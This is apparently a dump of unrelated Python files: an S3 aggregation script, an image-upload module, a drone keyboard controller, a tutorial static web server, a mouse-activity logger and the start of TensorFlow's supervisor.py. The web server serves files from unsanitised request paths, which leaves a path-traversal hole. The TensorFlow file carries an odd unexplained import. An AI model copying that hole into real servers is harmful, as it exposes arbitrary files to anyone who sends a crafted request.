logger.info("Test input filesystem")
read_test = all_files.iloc[0]["path"]
if input_file_system.exists(read_test):
logger.info(read_test)
with input_file_system.open(read_test) as f:
line_count = 0
for line in f:
line_count += 1
logger.info("Lines in first file: {}".format(line_count))
logger.info("Read test success!")
else:
logger.error("Unable to prove file {} exists".format(read_test))
graceful_shutdown(listener, logging_queue, 1)
if output_file_system is not None:
logger.info("Test output filesystem")
write_test = "{}{}".format(dst, uuid.uuid4())
output_file_system.touch(write_test)
logger.info("Successful create file: {}!".format(write_test))
with s3fs.S3File(output_file_system, write_test, mode="wb") as f:
f.write(
bytearray(
"test for {}. Now: {}\n".format(hour, datetime.now()), "utf-8"
)
)
logger.info("Successful write for file: {}!".format(write_test))
output_file_system.rm(write_test)
logger.info("Successfully deleted file: {}".format(write_test))
logger.info("Write test success for file {}!".format(write_test))
# The bulk of the work happens here
aggregate_range(
ctx,
src,
dst,
all_files,
utc,
logger,
schema,
input_file_system,
output_file_system,
tracking_file_system,
tracking_dst,
hour,
cpu_count,
timeout,
logging_queue,
)
graceful_shutdown(listener, logging_queue, 0)
def graceful_shutdown(listener, logging_queue, exit_code):
# Put one last record on the logging_queue to kill it and then wait
logging_queue.put_nowait(None)
# Now disable the listener
listener.join()
listener.close()
# Call an exit
sys.exit(exit_code)
if __name__ == "__main__":
try:
main()
except Exception:
traceback.print_exc()
sys.exit(1)
|
image.py
|
# Copyright (c) Niall Asher 2022
import datetime
import re
from base64 import urlsafe_b64decode
from math import gcd
from os import makedirs, mkdir, path
from types import SimpleNamespace
from base64 import b64encode
import PIL
from PIL import Image, ImageOps
from pony.orm import commit, db_session, select
from socialserver.util.config import config
from socialserver.util.output import console
from socialserver.db import db
from socialserver.constants import (
ImageTypes,
MAX_PIXEL_RATIO,
MAX_IMAGE_SIZE_GALLERY_PREVIEW,
MAX_IMAGE_SIZE_POST_PREVIEW,
MAX_IMAGE_SIZE_POST,
MAX_IMAGE_SIZE_PROFILE_PICTURE,
MAX_IMAGE_SIZE_PROFILE_PICTURE_LARGE,
ImageSupportedMimeTypes,
BLURHASH_X_COMPONENTS,
BLURHASH_Y_COMPONENTS,
PROCESSING_BLURHASH,
)
from secrets import token_urlsafe
from copy import copy
import magic
from typing import Tuple
import blurhash
from io import BytesIO
from threading import Thread
from hashlib import sha256
IMAGE_DIR = config.media.images.storage_dir
# where straight uploaded images are stored.
# the optimized ones are stored one above it
IMAGE_DIR_ORIGINAL = IMAGE_DIR + "/originals"
IMAGE_QUALITY = config.media.images.quality
# check if the image directory exists,
# if it doesn't, create it
if not path.exists(IMAGE_DIR):
makedirs(IMAGE_DIR)
console.log(f"Created image storage directory, {IMAGE_DIR}")
"""
save_images_to_disk
Saves an imageset (e.g. profile pic sm, lg) to disk, in the correct directory, with consistent naming.
Does not create a database entry.
in the future, this might be moved into amazon s3?
"""
# TODO: not sure how best to represent a dict with Python's type
# annotations. Need to fix this.
def save_images_to_disk(images: dict, image_hash: str) -> None:
def save_with_pixel_ratio(image, filename, pixel_ratio):
image.save(
f"{IMAGE_DIR}/{image_hash}/{filename}_{pixel_ratio}x.jpg",
type="JPEG",
quality=IMAGE_QUALITY,
progressive=True,
)
# FIXME: this is due to some deficiencies in the testing process.
if path.exists(f"{IMAGE_DIR}/{image_hash}"):
return
mkdir(f"{IMAGE_DIR}/{image_hash}")
for i in images.keys():
if i == ImageTypes.ORIGINAL:
images[i][0].save(
f"{IMAGE_DIR}/{image_hash}/{ImageTypes.ORIGINAL.value}.jpg",
type="JPEG",
quality=IMAGE_QUALITY,
)
else:
for j in images[i]:
save_with_pixel_ratio(j, i.value, images[i].index(j) + 1)
# FIXME: incredibly hacky way of dealing with duplicates.
images[i][images[i].index(j)] = token_urlsafe(16)
"""
create_random_image_identifier
return a random identifier to be associated with an image,
for retrieval purposes
"""
def create_random_image_identifier() -> str:
return token_urlsafe(32)
"""
mult_size_tuple
returns a new size tuple, multiplied from the given
one, for pixel ratio stuff
"""
def mult_size_tuple(size: Tuple[int, int], multiplier: int) -> Tuple[int, int]:
return tuple((int(size[0] * multiplier), int(size[1] * multiplier)))
"""
fit_image_to_size
Resizes an image to fit within the given size.
Doesn't care about MAX_PIXEL_RATIO; it's just the
unmodified original image.
"""
def fit_image_to_size(image: PIL.Image, size: Tuple[int, int]) -> PIL.Image:
img = copy(image)
img.thumbnail(size, PIL.Image.ANTIALIAS)
return img
"""
resize_image_aspect_aware
Resize an image, aspect aware.
Returns the result of fit_image_to_size after cropping to aspect
ratio from the top left. (i.e. you will get back an array of images,
for different pixel ratios, from 1 to MAX_PIXEL_RATIO)
"""
# TODO: fix typing; this returns a list of images
def resize_image_aspect_aware(image: PIL.Image, size: Tuple[int, int]) -> PIL.Image:
    # TODO: this really needs to make sure the image isn't
# smaller than the requested size already, since we don't
# want to make the size LARGER!
images = []
if image.size[0] < size[0] or image.size[1] < size[1]:
# create the largest possible image within max_image_size
size = calculate_largest_fit(image, size)
for pixel_ratio in range(1, MAX_PIXEL_RATIO + 1):
scaled_size = mult_size_tuple(size, pixel_ratio)
# if the scaled size is larger than the original, use the original
if scaled_size[0] > image.size[0] or scaled_size[1] > image.size[1]:
# TODO: see why the hell these are coming out as floats...
scaled_size = (int(size[0]), int(size[1]))
images.append(
ImageOps.fit(image, scaled_size, PIL.Image.BICUBIC, centering=(0.5, 0.5))
)
return images
"""
calculate largest image size to fit in the aspect ratio
given by a size.
used to prevent resizing an image to be larger than
it was originally, since that is pretty bad for optimization
(mind blowing, i know)
"""
def calculate_largest_fit(
    image: PIL.Image, max_size: Tuple[int, int]
) -> Tuple[int, int]:
    # calculate *target* aspect ratio from max size
    divisor = gcd(max_size[0], max_size[1])
    target_aspect_ratio = (max_size[0] / divisor, max_size[1] / divisor)
    # create the largest possible image within the original image size, and the aspect ratio.
    # the height follows from the width so that width:height matches the target ratio,
    # and both are cast to int so PIL receives integer dimensions.
    new_width = image.size[0] - (image.size[0] % target_aspect_ratio[0])
    new_height = new_width * (target_aspect_ratio[1] / target_aspect_ratio[0])
    return tuple((int(new_width), int(new_height)))
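# Worked example (illustrative, hypothetical numbers): for a 1000x800 source
# image and max_size (600, 400) the target ratio reduces to 3:2, so the widest
# multiple of 3 not exceeding 1000 is 999 and the matching height is
# 999 * 2 / 3 = 666, giving (999, 666).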
"""
convert_data_url_to_byte_buffer
Converts a data url to a BytesIO buffer, for further processing.
Does not resize, compress or save the image. Just loads it,
and returns it.
"""
def convert_data_url_to_byte_buffer(data_url: str) -> BytesIO:
# strip the mime type declaration, and the data: prefix,
# so we can convert to binary and create an image
data_url = re.sub(r"^data:image/.+;base64,", "", data_url)
# we're storing in BytesIO, so we don't have to
# write to disk, and we can use the image directly.
# we only want to store it once processing is done.
binary_data = BytesIO(urlsafe_b64decode(data_url))
return binary_data
"""
convert_buffer_to_image
Converts a buffer to a pil.Image object
"""
def convert_buffer_to_image(buffer: BytesIO) -> PIL.Image:
image = Image.open(buffer).convert("RGB")
return image
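# Minimal usage sketch (illustrative only; the data URL content is a placeholder,
# e.g. "data:image/jpeg;base64,<urlsafe-base64 payload>"):
def _example_data_url_to_image(data_url: str) -> PIL.Image:
    buffer = convert_data_url_to_byte_buffer(data_url)
    return convert_buffer_to_image(buffer)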
"""
commit_image_to_db
Commit db.Image entry to the database, and then return its id.
"""
@db_session
def commit_image_to_db(identifier: str, userid: int, blur_hash: str) -> None or int:
uploader = db.User.get(id=userid)
if uploader is None:
console.log("[bold red]Could not commit to DB: user id does not exist!")
else:
entry = db.Image(
creation_time=datetime.datetime.utcnow(),
identifier=identifier,
uploader=db.User.get(id=userid),
blur_hash=blur_hash,
)
commit()
return entry.id
"""
generate_image_of_type
Optimize the original copy of an already uploaded image
for a new type. Raises an exception if the image cannot be converted.
"""
def generate_image_of_type(identifier):
image_exists = db.Image.get(identifier=identifier) is not None
if not image_exists:
raise Exception("image not found")
pass
"""
InvalidImageException
Raised if there is an issue with the image format
"""
class InvalidImageException(Exception):
pass
"""
check_buffer_mimetype
Check the file type of binary data, to ensure it matches an
array of mimetypes. Returns true if ok, false if not.
"""
# TODO: if we're using this in multiple places it should be moved to socialserver.util.file!
def check_buffer_mimetype(buffer, mimetypes):
mimetype = magic.from_buffer(buffer.read(2048), mime=True)
buffer.seek(0)
if mimetype not in mimetypes:
return False
return True
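# Illustrative use (hypothetical helper; mirrors how _verify_image uses it below):
def _example_is_png(buffer: BytesIO) -> bool:
    # magic sniffs the first 2048 bytes and check_buffer_mimetype rewinds the buffer.
    return check_buffer_mimetype(buffer, ["image/png"])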
"""
_verify_image
verify an image using libmagic
"""
def _verify_image(image: BytesIO):
if not check_buffer_mimetype(image, ImageSupportedMimeTypes):
raise InvalidImageException
# we don't need to return anything;
# the exception will interrupt control
# flow if we have a problem. Otherwise,
# we just want to continue
"""
check_image_exists
check if an image exists based on its id
"""
def check_image_exists(identifier: str):
return db.Image.get(identifier=identifier) is not None
"""
get_image_data_url_legacy
gets an image as a dataurl, for use with the legacy client.
"""
def get_image_data_url_legacy(identifier: str, image_type: ImageTypes) -> str:
if not check_image_exists(identifier):
raise InvalidImageException
pixel_ratio = config.legacy_api_interface.image_pixel_ratio
    if image_type == ImageTypes.POST:
# only 1x for posts, since we store them at a very high size already.
# no other pixel ratio variants exist!
pixel_ratio = 1
file = f"{IMAGE_DIR}/{identifier}/{image_type.value}_{pixel_ratio}x.jpg"
# data_url = re.sub(r'^data:image/.+;base64,', '', data_url)
with open(file, "rb") as image_file:
return "data:image/jpg;base64," + b64encode(image_file.read()).decode()
"""
generate_blur_hash
Generate a blur hash from a given image
"""
def generate_blur_hash(image: Image) -> str:
im = copy(image)
buffer = BytesIO()
im.save(buffer, format="jpeg")
blur_hash = blurhash.encode(buffer, BLURHASH_X_COMPONENTS, BLURHASH_Y_COMPONENTS)
return blur_hash
"""
process_image
Convert the image into the appropriate format and commit it to the disk.
"""
@db_session
def process_image(image: Image, image_hash: str, image_id: int) -> None:
console.log(f"Processing image, id={image_id}. sha256sum={image_hash}")
# all resized images get 4 different pixel ratios, returned in an array from
# 0 to 3, where the pixel ratio is the index + 1. except for posts.
# we always deliver them in ''full'' quality (defined by MAX_IMAGE_SIZE_POST)
arr_gallery_preview_image = resize_image_aspect_aware(
image, MAX_IMAGE_SIZE_GALLERY_PREVIEW
)
# if upload_type == ImageUploadTypes.PROFILE_PICTURE:
arr_profilepic = resize_image_aspect_aware(image, MAX_IMAGE_SIZE_PROFILE_PICTURE)
arr_profilepic_lg = resize_image_aspect_aware(
image, MAX_IMAGE_SIZE_PROFILE_PICTURE_LARGE
)
img_post = fit_image_to_size(image, MAX_IMAGE_SIZE_POST)
arr_post_preview = resize_image_aspect_aware(image, MAX_IMAGE_SIZE_POST_PREVIEW)
arr_header = resize_image_aspect_aware(image, MAX_IMAGE_SIZE_POST)
images = {
ImageTypes.ORIGINAL: [image],
ImageTypes.POST: [img_post],
ImageTypes.POST_PREVIEW: arr_post_preview,
ImageTypes.HEADER: arr_header,
ImageTypes.GALLERY_PREVIEW: arr_gallery_preview_image,
ImageTypes.PROFILE_PICTURE: arr_profilepic,
ImageTypes.PROFILE_PICTURE_LARGE: arr_profilepic_lg,
}
save_images_to_disk(images, image_hash)
db_image = db.Image.get(id=image_id)
db_image.processed = True
db_image.blur_hash = generate_blur_hash(image)
commit()
console.log(f"Image, id={image_id}, processed.")
"""
handle_upload
Take an image as a BytesIO buffer (see notes.md, #images), and process it.
Will save it, store a db entry, and return
a SimpleNamespace with the following keys:
- id: db.Image ID
- uid: Image identifier
"""
@db_session
def handle_upload(
image: BytesIO, userid: int, threaded: bool = True
) -> SimpleNamespace:
# check that the given data is valid.
_verify_image(image)
uploader = db.User.get(id=userid)
if uploader is None:
console.log("[bold red]Could not commit to DB: user id does not exist!")
raise InvalidImageException # should maybe rename this?
# before we bother processing the image, we check if any image with an identical
# hash exists, since there is no point duplicating them in storage.
# get the hash of the image
image_hash = sha256(image.read()).hexdigest()
image.seek(0)
# and try to find an existing Image with the same one.
# if this != null, we'll use it to fill in some Image entry fields later.
existing_image = select(
        image for image in db.Image if image.sha256sum == image_hash
).limit(1)[::]
existing_image = existing_image[0] if len(existing_image) >= 1 else None
image = convert_buffer_to_image(image)
access_id = create_random_image_identifier()
# create the image entry now, so we can give back an identifier.
entry = db.Image(
creation_time=datetime.datetime.utcnow(),
identifier=access_id,
uploader=db.User.get(id=userid),
blur_hash=PROCESSING_BLURHASH,
sha256sum=image_hash,
processed=False,
)
commit()
if existing_image is not None:
entry.blur_hash = existing_image.blur_hash
entry.processed = True
return SimpleNamespace(id=entry.id, identifier=access_id, processed=True)
if threaded:
Thread(target=lambda: process_image(image, image_hash, entry.id)).start()
else:
process_image(image, image_hash, entry.id)
# if we're not using threading, then it will have been processed by now.
return SimpleNamespace(id=entry.id, identifier=access_id, processed=(not threaded))
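# Usage sketch (illustrative only; the raw bytes and user id are hypothetical):
def _example_handle_upload(raw_image_bytes: bytes, user_id: int) -> str:
    # Upload synchronously so the returned namespace already has processed=True.
    result = handle_upload(BytesIO(raw_image_bytes), user_id, threaded=False)
    return result.identifier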
|
test_high_level.py
|
#!/usr/bin/env python
# source - https://github.com/whoenig/crazyflie_ros/commit/b048c1f2fd3ee34f899fa0e2f6c58a4885a39405#diff-970be3522034ff436332d391db26982a
from __future__ import absolute_import, division, unicode_literals, print_function
import rospy
import crazyflie
import time
import tf
#from crazyflie_driver.msg import Hover
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from crazyflie_driver.msg import GenericLogData
from geometry_msgs.msg import PointStamped, TransformStamped, PoseStamped #PoseStamped added to support vrpn_client
from threading import Thread
import tty, termios
import sys
speed = 0.25
initialZ = 0.35
global front, back, up, left, right, zrange
front = back = up = left = right = zrange = 0.0
def get_ranges(msg):
global front, back, up, left, right, zrange
front=msg.values[0]/1000
back = msg.values[1]/1000
up = msg.values[2]/1000
left = msg.values[3]/1000
right = msg.values[4]/1000
zrange = msg.values[5]/1000
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def keypress():
global key
key = getch()
def handler(cf):
r=rospy.Rate(5)
time.sleep(1)
cf.takeoff(targetHeight = initialZ, duration = 5.0)
time.sleep(5.0)
x, y, yaw = 0, 0, 0
z=initialZ
global key
key = None
global front, back, up, left, right, zrange
dist_threshold=0.1
def_duration=0.8 #1.8
try:
rospy.loginfo("keyboard controller.")
rospy.loginfo("press SPACE for emergency stop + land.")
rospy.loginfo("press 's' for stop.")
rospy.loginfo("press 'w' for forward.")
rospy.loginfo("press 'x' for backward.")
rospy.loginfo("press 'a' for left.")
rospy.loginfo("press 'd' for right.")
rospy.loginfo("press 'i' for up.")
rospy.loginfo("press 'k' for down.")
        rospy.loginfo("press 'q','e' for yaw +-90 deg.")
while not rospy.is_shutdown():
if front > 0 :
if front < dist_threshold:
rospy.loginfo("forward collision avoidance")
cf.goTo(goal=[-0.1, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif back < dist_threshold:
rospy.loginfo("back collision avoidance")
cf.goTo(goal=[0.1, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif right < dist_threshold:
rospy.loginfo("right collision avoidance")
cf.goTo(goal=[0.0, 0.1, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif left < dist_threshold:
rospy.loginfo("left collision avoidance")
cf.goTo(goal=[0.0, -0.1, 0.0], yaw=0, duration=def_duration, relative=True)
time.sleep(def_duration)
elif up < dist_threshold:
rospy.loginfo("top collision avoidance")
land_duration = z * 3
cf.land(targetHeight=0.0, duration=land_duration)
time.sleep(land_duration)
cf.stop()
break
if key is not None:
                rospy.loginfo("************* Key pressed is " + str(key))
if key == ' ':
# emergency land
land_duration=z*3
cf.land(targetHeight=0.0, duration=land_duration)
time.sleep(land_duration-0.5)
cf.stop()
break
elif key == 'w':
# move forward
cf.goTo(goal=[0.25, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'x':
# move backward
cf.goTo(goal=[-0.25, 0.0, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'd':
# move right
cf.goTo(goal=[0.0, -0.25, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'a':
# move left
cf.goTo(goal=[0.0, 0.25, 0.0], yaw=0, duration=def_duration, relative=True)
elif key == 'i':
# move up
cf.goTo(goal=[0.0, 0.0, 0.05], yaw=0, duration=def_duration, relative=True)
elif key == 'k':
# move down
cf.goTo(goal=[0.0, 0.0, -0.05], yaw=0, duration=def_duration, relative=True)
elif key == 'q':
                    # yaw +90 degrees (1.5708 rad)
cf.goTo(goal=[0.0, 0.0, 0.0], yaw=1.5708, duration=def_duration+1.0, relative=True) #slow down yaw rotation
elif key == 'e':
                    # yaw -90 degrees (1.5708 rad)
cf.goTo(goal=[0.0, 0.0, 0.0], yaw= -1.5708, duration=def_duration+1.0, relative=True) #slow down yaw rotation
#elif key == 's':
# stop
key = None
t2 = Thread(target=keypress, )
t2.start()
#print(" gospeed x: {}, y: {}, z: {} , yaw: {} \n".format( x, y, z ,yaw))
#cf.goSpeed(x, y, z, yaw)
r.sleep()
rospy.loginfo('********EXITING*********')
cf.stop()
#break
except Exception as e:
cf.stop()
rospy.loginfo('*******keyboard input exception')
rospy.loginfo(e)
if __name__ == '__main__':
rospy.init_node('test_high_level')
rospy.Subscriber('/cf1/log_ranges', GenericLogData, get_ranges)
prefix = '/cf1'
cf = crazyflie.Crazyflie("/cf1", "world")
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
cf.setParam("commander/enHighLevel", 1)
cf.setParam("stabilizer/estimator", 2) # Use EKF
cf.setParam("ctrlMel/kp_z", 0.8) #reduce z wobble - default 1.25
#cf.setParam("ctrlMel/ki_z", 0.06) #reduce z wobble - default 0.05
#cf.setParam("ctrlMel/kd_z", 0.2) #reduce z wobble - default 0.4
#cf.setParam("ctrlMel/i_range_z", 0.2) #reduce z wobble
## reset kalman
cf.setParam("kalman/initialX", 0)
cf.setParam("kalman/initialY", 0)
cf.setParam("kalman/initialZ", 0)
cf.setParam("kalman/resetEstimation", 1)
########
cf.setParam("stabilizer/controller", 2) # 2=Use mellinger controller
time.sleep(1.0)
rospy.loginfo("launching threads")
t1 = Thread(target=handler, args=(cf,))
t2 = Thread(target=keypress, )
t1.start()
t2.start()
|
03-静态web服务器-多任务.py
|
import socket
import os
import threading
# Handle a client request
def handle_client_request(new_socket):
    # Receive the client's request data
    recv_data = new_socket.recv(4096)
    # If the request data is empty, close the connection and return
    if len(recv_data) == 0:
        new_socket.close()
        return
    # Decode the received binary data
    recv_content = recv_data.decode("utf-8")
    # Split the request data
    request_list = recv_content.split(" ", maxsplit=2)
    # Extract the requested resource path
    request_path = request_list[1]
    print(request_path)
    if request_path == "/":
        request_path = "/index.html"
    # Check whether the file exists
    # 1. os.path.exists
    # if not os.path.exists("static"+request_path):
    # print("static"+request_path+"not exist")
    # return
    # 2. try-except
    try:
        # Open and read the file; "rb" mode is used so image files can be served too
        with open("static"+request_path, "rb") as file:
            file_data = file.read()
    except Exception as e:
        # Reaching this point means the requested file was not found, so return 404
        # Response line
        response_line = "HTTP/1.1 404 Not Found\r\n"
        # Response headers
        response_header = "Server: LRY/1.0\r\n"
        # Blank line
        # Response body
        with open("static/error.html", "rb") as file:
            file_data = file.read()
        response_body = file_data
        response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
        # response is already binary data, no further encoding is needed
        # # Encode the data to binary
        # response_data = response.encode("utf-8")
        # Send the HTTP response
        new_socket.send(response)
    else:
        # Reaching this point means the requested file was found, so return 200
        # Wrap the data in an HTTP response and send it to the browser client
        # Response line
        response_line = "HTTP/1.1 200 OK\r\n"
        # Response headers
        response_header = "Server: LRY/1.0\r\n"
        # Blank line
        # Response body
        response_body = file_data
        # response_body is binary and cannot be concatenated with str, so encode the string part first
        response = (response_line + response_header + "\r\n").encode("utf-8") + response_body
        # response is already binary data, no further encoding is needed
        # # Encode the data to binary
        # response_data = response.encode("utf-8")
        # Send the HTTP response
        new_socket.send(response)
    finally:
        # Close the connection socket
        new_socket.close()
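# Illustrative note (not part of the original handler): the response assembled
# above is a plain HTTP/1.1 message, i.e.
#   HTTP/1.1 200 OK\r\n
#   Server: LRY/1.0\r\n
#   \r\n
#   <file bytes>
# With the server running locally it can be exercised with, for example:
#   curl -v http://127.0.0.1:8000/index.html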
def main():
    # Create a TCP server socket
    tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow the port number to be reused
    tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
    # Bind the port
    tcp_server_socket.bind(("", 8000))
    # Start listening
    tcp_server_socket.listen(128)
    # Wait for client requests in a loop
    while True:
        # Wait for and accept a client connection
        new_socket, ip_port = tcp_server_socket.accept()
        # Reaching this point means the connection was established successfully
        sub_thread = threading.Thread(target=handle_client_request, args=(new_socket,))
        # Make the worker a daemon thread so it exits with the main thread
        sub_thread.setDaemon(True)
        # Start the worker thread
        sub_thread.start()
# Only run when executed as the main program
if __name__ == "__main__":
    main()
|
logger.py
|
import os
import json
import time
from threading import Event, Thread
from pynput.mouse import Listener, Button
from sentry_sdk import capture_exception
from utils.directions import Direction
from consts import CLICK_PATH, GB_TO_B, MOVE_PATH, MS_TO_NS, NS_TO_MS, SAVE_INTERVAL_IN_S, RECORD_INTERVAL_IN_MS, SCROLL_PATH
class Logger:
_kill = Event()
_LISTENER: Listener
_listen = Event()
_dump = Event()
_movement_data = []
_last_movement_record = 0
_click_data = []
_click_times = dict()
_click_positions = dict()
_scroll_data = []
def __init__(self) -> None:
Thread(name="Dumper", daemon=True, target=self.execute_all).start()
self._LISTENER = Listener(
on_move=self.on_move,
on_click=self.on_click,
on_scroll=self.on_scroll)
self._LISTENER.start()
self._LISTENER.wait()
def __delete__(self, _) -> None:
self._kill.set()
self._LISTENER.stop()
def start(self) -> None:
self._listen.set()
self._dump.set()
def stop(self) -> None:
self._listen.clear()
self._dump.clear()
def on_move(self, x: int, y: int) -> None:
"""record movement in set timesteps"""
        if not self._listen.is_set():
return
if self._last_movement_record + (RECORD_INTERVAL_IN_MS * MS_TO_NS) <= time.time_ns():
self._movement_data.append(dict(
timestamp=int(time.time_ns() * NS_TO_MS),
position=dict(x=x, y=y)))
self._last_movement_record = time.time_ns()
def on_click(self, x: int, y: int, button: Button, pressed: bool) -> None:
"""record clicks with clicked button, time, duration and positions"""
        if not self._listen.is_set():
return
if pressed:
self._click_times[button.name] = time.time_ns()
self._click_positions[button.name] = (x, y)
else:
try:
self._click_data.append(dict(
startTime=int(self._click_times[button.name] * NS_TO_MS),
duration=int((time.time_ns()-self._click_times[button.name]) * NS_TO_MS),
button=button.name,
startPosition=dict(x=self._click_positions[button.name][0], y=self._click_positions[button.name][1]),
endPosition=dict(x=x, y=y)))
except Exception as e:
capture_exception(e)
except:
pass
def on_scroll(self, x: int, y: int, dx: int, dy: int) -> None:
"""record scrolling with time, position and direction"""
        if not self._listen.is_set():
return
self._scroll_data.append(dict(
timestamp=int(time.time_ns() * NS_TO_MS),
position=dict(x=x, y=y),
direction=Direction.getDirection(dx, dy).name))
def directory_sized(self, path: str, size: int) -> None:
while sum([os.stat(it).st_size for it in os.scandir(path)]) > size*GB_TO_B:
oldest_file = min(os.scandir(path), key=os.path.getctime)
os.remove(os.path.abspath(oldest_file))
def dump(self, path: str, data: list) -> None:
with open(f"{path}/{int(time.time_ns() * NS_TO_MS)}.json", 'w', encoding="UTF-8") as file:
file.write(json.dumps(data))
    def execute(self, path: str, max_size_in_gb: int, data: list) -> None:
os.makedirs(path, exist_ok=True)
self.directory_sized(path, max_size_in_gb)
self.dump(path, data)
data.clear()
def execute_all(self) -> None:
while not self._kill.wait(SAVE_INTERVAL_IN_S):
if self._dump.is_set():
try:
self.execute(MOVE_PATH, 3, self._movement_data)
self.execute(CLICK_PATH, 1, self._click_data)
self.execute(SCROLL_PATH, 1, self._scroll_data)
finally:
pass
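# Minimal usage sketch (illustrative only; SAVE_INTERVAL_IN_S comes from consts):
if __name__ == "__main__":
    logger = Logger()  # starts the pynput listener and the background dumper thread
    logger.start()     # begin recording and periodic dumping
    time.sleep(SAVE_INTERVAL_IN_S)
    logger.stop()      # pause recording without killing the threads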
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from chineselib import trainset
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
  reinitializes variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
@{tf.train.Server.create_local_server} for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific host, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
    named `server`).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess, ))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
  either the optional `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
